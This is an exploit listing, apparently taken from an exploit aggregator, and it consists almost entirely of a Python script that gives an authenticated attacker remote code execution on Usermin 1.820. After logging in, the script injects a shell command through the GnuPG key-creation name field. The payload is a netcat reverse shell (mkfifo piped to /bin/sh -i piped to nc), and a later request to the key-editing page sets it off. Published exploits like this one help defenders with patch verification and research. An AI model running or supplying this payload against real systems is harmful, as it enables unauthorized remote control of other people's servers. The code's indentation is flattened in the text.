Exploit for Usermin 1.820 Remote Code Execution

Name: Exploit for Usermin 1.820 Remote Code Execution
Rating: 5 (104 reviews)
2021-08-27 | CVSS -0.4
## https://sploitus.com/exploit?id=PACKETSTORM:163921
# Title: Usermin 1.820 - Remote Code Execution (RCE) (Authenticated)  
# Date: 27.08.2021  
# Author: Numan Türle  
# Vendor Homepage: https://www.webmin.com/usermin.html  
# Software Link: https://github.com/webmin/usermin  
# Version: <=1820  
# https://www.youtube.com/watch?v=wiRIWFAhz24  
  
#!/usr/bin/python3  
# -*- coding: utf-8 -*-  
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )  
# author: twitter.com/numanturle  
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD  
# https://youtu.be/wiRIWFAhz24  
  
  
import argparse,requests,warnings,json,re  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
from cmd import Cmd  
  
warnings.simplefilter('ignore',InsecureRequestWarning)  
  
def init():  
parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')  
parser.add_argument('-u','--host',help='Host', type=str, required=True)  
parser.add_argument('-l', '--login',help='Username', type=str, required=True)  
parser.add_argument('-p', '--password',help='Password', type=str, required=True)  
args = parser.parse_args()  
exploit(args)  
  
def exploit(args):  
  
listen_ip = "0.0.0.0"  
listen_port = 1337  
  
session = requests.Session()  
target = "https://{}:20000".format(args.host)  
username = args.login  
password = args.password  
  
print("[+] Target {}".format(target))  
  
headers = {  
'Cookie': 'redirect=1; testing=1;',  
'Referer': target  
}  
  
login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password})  
login_content = str(login.content)  
search = "webmin_search.cgi"  
check_login_string = re.findall(search,login_content)  
if check_login_string:  
session_hand_login = session.cookies.get_dict()  
  
print("[+] Login successfully")  
print("[+] Setup GnuPG")  
  
payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip,listen_port)  
#payload = "whoami;"  
post_data = {  
"name":'";{}echo "'.format(payload),  
"email":"1337@webmin.com",  
}  
  
print("[+] Payload {}".format(post_data))  
  
session.headers.update({'referer': target})  
  
create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data)  
create_secret_content = str(create_secret.content)  
  
search = "successfully"  
check_exp = re.findall(search,create_secret_content)  
  
if check_exp:  
  
print("[+] Setup successful")  
print("[+] Fetching key list")  
  
session.headers.update({'referer': target})  
key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False)  
last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2]  
print("[+] Key : {}".format(last_gets_key))  
  
session.headers.update({'referer': target})  
try:  
key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3)  
except requests.exceptions.ReadTimeout:  
pass  
  
print("[+] 5ucc355fully_3xpl017")  
else:  
print("[-] an unexpected error occurred" )  
  
  
  
  
else:  
print("[-] AUTH : Login failed.")  
  
if __name__ == "__main__":  
init()